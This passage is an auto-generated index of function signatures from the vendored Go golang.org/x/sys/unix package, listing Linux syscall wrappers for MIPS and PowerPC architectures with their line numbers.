typ int, proto int, fd *[2]int32) (err error) { function getpeername (line 379) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 389) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 399) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 416) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 432) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 443) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function mmap (line 454) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... function Gettimeofday (line 465) | func Gettimeofday(tv *Timeval) (err error) { function kexecFileLoad (line 475) | func kexecFileLoad(kernelFd int, initrdFd int, cmdlineLen int, cmdline s... FILE: vendor/golang.org/x/sys/unix/zsyscall_linux_mips.go function fanotifyMark (line 17) | func fanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname *... function Fallocate (line 27) | func Fallocate(fd int, mode uint32, off int64, len int64) (err error) { function Tee (line 37) | func Tee(rfd int, wfd int, len int, flags int) (n int64, err error) { function EpollWait (line 48) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... function Fadvise (line 65) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchown (line 75) | func Fchown(fd int, uid int, gid int) (err error) { function Ftruncate (line 85) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 95) | func Getegid() (egid int) { function Geteuid (line 103) | func Geteuid() (euid int) { function Getgid (line 111) | func Getgid() (gid int) { function Getuid (line 119) | func Getuid() (uid int) { function Lchown (line 127) | func Lchown(path string, uid int, gid int) (err error) { function Listen (line 142) | func Listen(s int, n int) (err error) { function pread (line 152) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 169) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Renameat (line 186) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function Select (line 206) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function sendfile (line 217) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function setfsgid (line 228) | func setfsgid(gid int) (prev int, err error) { function setfsuid (line 239) | func setfsuid(uid int) (prev int, err error) { function Shutdown (line 250) | func Shutdown(fd int, how int) (err error) { function Splice (line 260) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function SyncFileRange (line 271) | func SyncFileRange(fd int, off int64, n int64, flags int) (err error) { function Truncate (line 281) | func Truncate(path string, length int64) (err error) { function Ustat (line 296) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function accept4 (line 306) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... function bind (line 317) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 327) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 337) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 348) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 358) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 368) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 378) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 389) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function getpeername (line 399) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 409) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 419) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 436) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 452) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 463) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function Ioperm (line 474) | func Ioperm(from int, num int, on int) (err error) { function Iopl (line 484) | func Iopl(level int) (err error) { function futimesat (line 494) | func futimesat(dirfd int, path string, times *[2]Timeval) (err error) { function Gettimeofday (line 509) | func Gettimeofday(tv *Timeval) (err error) { function Time (line 519) | func Time(t *Time_t) (tt Time_t, err error) { function Utime (line 530) | func Utime(path string, buf *Utimbuf) (err error) { function utimes (line 545) | func utimes(path string, times *[2]Timeval) (err error) { function Lstat (line 560) | func Lstat(path string, stat *Stat_t) (err error) { function Fstat (line 575) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 585) | func Fstatat(dirfd int, path string, stat *Stat_t, flags int) (err error) { function Stat (line 600) | func Stat(path string, stat *Stat_t) (err error) { function Pause (line 615) | func Pause() (err error) { function mmap2 (line 625) | func mmap2(addr uintptr, length uintptr, prot int, flags int, fd int, pa... function getrlimit (line 636) | func getrlimit(resource int, rlim *rlimit32) (err error) { function Alarm (line 646) | func Alarm(seconds uint) (remaining uint, err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_linux_mips64.go function fanotifyMark (line 17) | func fanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname *... function Fallocate (line 27) | func Fallocate(fd int, mode uint32, off int64, len int64) (err error) { function Tee (line 37) | func Tee(rfd int, wfd int, len int, flags int) (n int64, err error) { function EpollWait (line 48) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... function Fadvise (line 65) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchown (line 75) | func Fchown(fd int, uid int, gid int) (err error) { function Fstatfs (line 85) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Ftruncate (line 95) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 105) | func Getegid() (egid int) { function Geteuid (line 113) | func Geteuid() (euid int) { function Getgid (line 121) | func Getgid() (gid int) { function Getrlimit (line 129) | func Getrlimit(resource int, rlim *Rlimit) (err error) { function Getuid (line 139) | func Getuid() (uid int) { function Lchown (line 147) | func Lchown(path string, uid int, gid int) (err error) { function Listen (line 162) | func Listen(s int, n int) (err error) { function Pause (line 172) | func Pause() (err error) { function pread (line 182) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 199) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Renameat (line 216) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function Seek (line 236) | func Seek(fd int, offset int64, whence int) (off int64, err error) { function sendfile (line 247) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function setfsgid (line 258) | func setfsgid(gid int) (prev int, err error) { function setfsuid (line 269) | func setfsuid(uid int) (prev int, err error) { function Shutdown (line 280) | func Shutdown(fd int, how int) (err error) { function Splice (line 290) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function Statfs (line 301) | func Statfs(path string, buf *Statfs_t) (err error) { function SyncFileRange (line 316) | func SyncFileRange(fd int, off int64, n int64, flags int) (err error) { function Truncate (line 326) | func Truncate(path string, length int64) (err error) { function Ustat (line 341) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function accept4 (line 351) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... function bind (line 362) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 372) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 382) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 393) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 403) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 413) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 423) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 434) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function getpeername (line 444) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 454) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 464) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 481) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 497) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 508) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function mmap (line 519) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... function futimesat (line 530) | func futimesat(dirfd int, path string, times *[2]Timeval) (err error) { function Gettimeofday (line 545) | func Gettimeofday(tv *Timeval) (err error) { function Utime (line 555) | func Utime(path string, buf *Utimbuf) (err error) { function utimes (line 570) | func utimes(path string, times *[2]Timeval) (err error) { function fstat (line 585) | func fstat(fd int, st *stat_t) (err error) { function fstatat (line 595) | func fstatat(dirfd int, path string, st *stat_t, flags int) (err error) { function lstat (line 610) | func lstat(path string, st *stat_t) (err error) { function stat (line 625) | func stat(path string, st *stat_t) (err error) { function Alarm (line 640) | func Alarm(seconds uint) (remaining uint, err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_linux_mips64le.go function fanotifyMark (line 17) | func fanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname *... function Fallocate (line 27) | func Fallocate(fd int, mode uint32, off int64, len int64) (err error) { function Tee (line 37) | func Tee(rfd int, wfd int, len int, flags int) (n int64, err error) { function EpollWait (line 48) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... function Fadvise (line 65) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchown (line 75) | func Fchown(fd int, uid int, gid int) (err error) { function Fstatfs (line 85) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Ftruncate (line 95) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 105) | func Getegid() (egid int) { function Geteuid (line 113) | func Geteuid() (euid int) { function Getgid (line 121) | func Getgid() (gid int) { function Getrlimit (line 129) | func Getrlimit(resource int, rlim *Rlimit) (err error) { function Getuid (line 139) | func Getuid() (uid int) { function Lchown (line 147) | func Lchown(path string, uid int, gid int) (err error) { function Listen (line 162) | func Listen(s int, n int) (err error) { function Pause (line 172) | func Pause() (err error) { function pread (line 182) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 199) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Renameat (line 216) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function Seek (line 236) | func Seek(fd int, offset int64, whence int) (off int64, err error) { function sendfile (line 247) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function setfsgid (line 258) | func setfsgid(gid int) (prev int, err error) { function setfsuid (line 269) | func setfsuid(uid int) (prev int, err error) { function Shutdown (line 280) | func Shutdown(fd int, how int) (err error) { function Splice (line 290) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function Statfs (line 301) | func Statfs(path string, buf *Statfs_t) (err error) { function SyncFileRange (line 316) | func SyncFileRange(fd int, off int64, n int64, flags int) (err error) { function Truncate (line 326) | func Truncate(path string, length int64) (err error) { function Ustat (line 341) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function accept4 (line 351) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... function bind (line 362) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 372) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 382) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 393) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 403) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 413) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 423) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 434) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function getpeername (line 444) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 454) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 464) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 481) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 497) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 508) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function mmap (line 519) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... function futimesat (line 530) | func futimesat(dirfd int, path string, times *[2]Timeval) (err error) { function Gettimeofday (line 545) | func Gettimeofday(tv *Timeval) (err error) { function Utime (line 555) | func Utime(path string, buf *Utimbuf) (err error) { function utimes (line 570) | func utimes(path string, times *[2]Timeval) (err error) { function fstat (line 585) | func fstat(fd int, st *stat_t) (err error) { function fstatat (line 595) | func fstatat(dirfd int, path string, st *stat_t, flags int) (err error) { function lstat (line 610) | func lstat(path string, st *stat_t) (err error) { function stat (line 625) | func stat(path string, st *stat_t) (err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_linux_mipsle.go function fanotifyMark (line 17) | func fanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname *... function Fallocate (line 27) | func Fallocate(fd int, mode uint32, off int64, len int64) (err error) { function Tee (line 37) | func Tee(rfd int, wfd int, len int, flags int) (n int64, err error) { function EpollWait (line 48) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... function Fadvise (line 65) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchown (line 75) | func Fchown(fd int, uid int, gid int) (err error) { function Ftruncate (line 85) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 95) | func Getegid() (egid int) { function Geteuid (line 103) | func Geteuid() (euid int) { function Getgid (line 111) | func Getgid() (gid int) { function Getuid (line 119) | func Getuid() (uid int) { function Lchown (line 127) | func Lchown(path string, uid int, gid int) (err error) { function Listen (line 142) | func Listen(s int, n int) (err error) { function pread (line 152) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 169) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Renameat (line 186) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function Select (line 206) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function sendfile (line 217) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function setfsgid (line 228) | func setfsgid(gid int) (prev int, err error) { function setfsuid (line 239) | func setfsuid(uid int) (prev int, err error) { function Shutdown (line 250) | func Shutdown(fd int, how int) (err error) { function Splice (line 260) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function SyncFileRange (line 271) | func SyncFileRange(fd int, off int64, n int64, flags int) (err error) { function Truncate (line 281) | func Truncate(path string, length int64) (err error) { function Ustat (line 296) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function accept4 (line 306) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... function bind (line 317) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 327) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 337) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 348) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 358) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 368) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 378) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 389) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function getpeername (line 399) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 409) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 419) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 436) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 452) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 463) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function Ioperm (line 474) | func Ioperm(from int, num int, on int) (err error) { function Iopl (line 484) | func Iopl(level int) (err error) { function futimesat (line 494) | func futimesat(dirfd int, path string, times *[2]Timeval) (err error) { function Gettimeofday (line 509) | func Gettimeofday(tv *Timeval) (err error) { function Time (line 519) | func Time(t *Time_t) (tt Time_t, err error) { function Utime (line 530) | func Utime(path string, buf *Utimbuf) (err error) { function utimes (line 545) | func utimes(path string, times *[2]Timeval) (err error) { function Lstat (line 560) | func Lstat(path string, stat *Stat_t) (err error) { function Fstat (line 575) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 585) | func Fstatat(dirfd int, path string, stat *Stat_t, flags int) (err error) { function Stat (line 600) | func Stat(path string, stat *Stat_t) (err error) { function Pause (line 615) | func Pause() (err error) { function mmap2 (line 625) | func mmap2(addr uintptr, length uintptr, prot int, flags int, fd int, pa... function getrlimit (line 636) | func getrlimit(resource int, rlim *rlimit32) (err error) { function Alarm (line 646) | func Alarm(seconds uint) (remaining uint, err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_linux_ppc.go function fanotifyMark (line 17) | func fanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname *... function Fallocate (line 27) | func Fallocate(fd int, mode uint32, off int64, len int64) (err error) { function Tee (line 37) | func Tee(rfd int, wfd int, len int, flags int) (n int64, err error) { function EpollWait (line 48) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... function Fchown (line 65) | func Fchown(fd int, uid int, gid int) (err error) { function Fstat (line 75) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 85) | func Fstatat(dirfd int, path string, stat *Stat_t, flags int) (err error) { function Ftruncate (line 100) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 110) | func Getegid() (egid int) { function Geteuid (line 118) | func Geteuid() (euid int) { function Getgid (line 126) | func Getgid() (gid int) { function Getuid (line 134) | func Getuid() (uid int) { function Ioperm (line 142) | func Ioperm(from int, num int, on int) (err error) { function Iopl (line 152) | func Iopl(level int) (err error) { function Lchown (line 162) | func Lchown(path string, uid int, gid int) (err error) { function Listen (line 177) | func Listen(s int, n int) (err error) { function Lstat (line 187) | func Lstat(path string, stat *Stat_t) (err error) { function Pause (line 202) | func Pause() (err error) { function pread (line 212) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 229) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Renameat (line 246) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function Select (line 266) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function sendfile (line 277) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function setfsgid (line 288) | func setfsgid(gid int) (prev int, err error) { function setfsuid (line 299) | func setfsuid(uid int) (prev int, err error) { function Shutdown (line 310) | func Shutdown(fd int, how int) (err error) { function Splice (line 320) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function Stat (line 331) | func Stat(path string, stat *Stat_t) (err error) { function Truncate (line 346) | func Truncate(path string, length int64) (err error) { function Ustat (line 361) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function accept4 (line 371) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... function bind (line 382) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 392) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 402) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 413) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 423) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 433) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 443) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 454) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function getpeername (line 464) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 474) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 484) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 501) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 517) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 528) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function futimesat (line 539) | func futimesat(dirfd int, path string, times *[2]Timeval) (err error) { function Gettimeofday (line 554) | func Gettimeofday(tv *Timeval) (err error) { function Time (line 564) | func Time(t *Time_t) (tt Time_t, err error) { function Utime (line 575) | func Utime(path string, buf *Utimbuf) (err error) { function utimes (line 590) | func utimes(path string, times *[2]Timeval) (err error) { function mmap2 (line 605) | func mmap2(addr uintptr, length uintptr, prot int, flags int, fd int, pa... function getrlimit (line 616) | func getrlimit(resource int, rlim *rlimit32) (err error) { function syncFileRange2 (line 626) | func syncFileRange2(fd int, flags int, off int64, n int64) (err error) { function kexecFileLoad (line 636) | func kexecFileLoad(kernelFd int, initrdFd int, cmdlineLen int, cmdline s... function Alarm (line 651) | func Alarm(seconds uint) (remaining uint, err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_linux_ppc64.go function fanotifyMark (line 17) | func fanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname *... function Fallocate (line 27) | func Fallocate(fd int, mode uint32, off int64, len int64) (err error) { function Tee (line 37) | func Tee(rfd int, wfd int, len int, flags int) (n int64, err error) { function EpollWait (line 48) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... function Fadvise (line 65) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchown (line 75) | func Fchown(fd int, uid int, gid int) (err error) { function Fstat (line 85) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 95) | func Fstatat(dirfd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 110) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Ftruncate (line 120) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 130) | func Getegid() (egid int) { function Geteuid (line 138) | func Geteuid() (euid int) { function Getgid (line 146) | func Getgid() (gid int) { function Getrlimit (line 154) | func Getrlimit(resource int, rlim *Rlimit) (err error) { function Getuid (line 164) | func Getuid() (uid int) { function Ioperm (line 172) | func Ioperm(from int, num int, on int) (err error) { function Iopl (line 182) | func Iopl(level int) (err error) { function Lchown (line 192) | func Lchown(path string, uid int, gid int) (err error) { function Listen (line 207) | func Listen(s int, n int) (err error) { function Lstat (line 217) | func Lstat(path string, stat *Stat_t) (err error) { function Pause (line 232) | func Pause() (err error) { function pread (line 242) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 259) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Renameat (line 276) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function Seek (line 296) | func Seek(fd int, offset int64, whence int) (off int64, err error) { function Select (line 307) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function sendfile (line 318) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function setfsgid (line 329) | func setfsgid(gid int) (prev int, err error) { function setfsuid (line 340) | func setfsuid(uid int) (prev int, err error) { function Shutdown (line 351) | func Shutdown(fd int, how int) (err error) { function Splice (line 361) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function Stat (line 372) | func Stat(path string, stat *Stat_t) (err error) { function Statfs (line 387) | func Statfs(path string, buf *Statfs_t) (err error) { function Truncate (line 402) | func Truncate(path string, length int64) (err error) { function Ustat (line 417) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function accept4 (line 427) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... function bind (line 438) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 448) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 458) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 469) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 479) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 489) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 499) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 510) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function getpeername (line 520) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 530) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 540) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 557) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 573) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 584) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function mmap (line 595) | func mmap(addr uintptr, length uintptr, prot int, flags int, fd int, off... function futimesat (line 606) | func futimesat(dirfd int, path string, times *[2]Timeval) (err error) { function Gettimeofday (line 621) | func Gettimeofday(tv *Timeval) (err error) { function Time (line 631) | func Time(t *Time_t) (tt Time_t, err error) { function Utime (line 642) | func Utime(path string, buf *Utimbuf) (err error) { function utimes (line 657) | func utimes(path string, times *[2]Timeval) (err error) { function syncFileRange2 (line 672) | func syncFileRange2(fd int, flags int, off int64, n int64) (err error) { function kexecFileLoad (line 682) | func kexecFileLoad(kernelFd int, initrdFd int, cmdlineLen int, cmdline s... function Alarm (line 697) | func Alarm(seconds uint) (remaining uint, err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_linux_ppc64le.go function fanotifyMark (line 17) | func fanotifyMark(fd int, flags uint, mask uint64, dirFd int, pathname *... function Fallocate (line 27) | func Fallocate(fd int, mode uint32, off int64, len int64) (err error) { function Tee (line 37) | func Tee(rfd int, wfd int, len int, flags int) (n int64, err error) { function EpollWait (line 48) | func EpollWait(epfd int, events []EpollEvent, msec int) (n int, err erro... function Fadvise (line 65) | func Fadvise(fd int, offset int64, length int64, advice int) (err error) { function Fchown (line 75) | func Fchown(fd int, uid int, gid int) (err error) { function Fstat (line 85) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 95) | func Fstatat(dirfd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 110) | func Fstatfs(fd int, buf *Statfs_t) (err error) { function Ftruncate (line 120) | func Ftruncate(fd int, length int64) (err error) { function Getegid (line 130) | func Getegid() (egid int) { function Geteuid (line 138) | func Geteuid() (euid int) { function Getgid (line 146) | func Getgid() (gid int) { function Getrlimit (line 154) | func Getrlimit(resource int, rlim *Rlimit) (err error) { function Getuid (line 164) | func Getuid() (uid int) { function Ioperm (line 172) | func Ioperm(from int, num int, on int) (err error) { function Iopl (line 182) | func Iopl(level int) (err error) { function Lchown (line 192) | func Lchown(path string, uid int, gid int) (err error) { function Listen (line 207) | func Listen(s int, n int) (err error) { function Lstat (line 217) | func Lstat(path string, stat *Stat_t) (err error) { function Pause (line 232) | func Pause() (err error) { function pread (line 242) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 259) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function Renameat (line 276) | func Renameat(olddirfd int, oldpath string, newdirfd int, newpath string... function Seek (line 296) | func Seek(fd int, offset int64, whence int) (off int64, err error) { function Select (line 307) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function sendfile (line 318) | func sendfile(outfd int, infd int, offset *int64, count int) (written in... function setfsgid (line 329) | func setfsgid(gid int) (prev int, err error) { function setfsuid (line 340) | func setfsuid(uid int) (prev int, err error) { function Shutdown (line 351) | func Shutdown(fd int, how int) (err error) { function Splice (line 361) | func Splice(rfd int, roff *int64, wfd int, woff *int64, len int, flags i... function Stat (line 372) | func Stat(path string, stat *Stat_t) (err error) { function Statfs (line 387) | func Statfs(path string, buf *Statfs_t) (err error) { function Truncate (line 402) | func Truncate(path string, length int64) (err error) { function Ustat (line 417) | func Ustat(dev int, ubuf *Ustat_t) (err error) { function accept4 (line 427) | func accept4(s int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (... function bind (line 438) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 448) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function getgroups (line 458) | func getgroups(n int, list *_Gid_t) (nn int, err error) { function setgroups (line 469) | func setgroups(n int, list *_Gid_t) (err error) { function getsockopt (line 479) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 489) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function socket (line 499) | func socket(domain int, typ int, proto int) (fd int, err error) { function socketpair (line 510) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function getpeername (line 520) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 530) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function recvfrom (line 540) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 557) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 573) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 584) | func 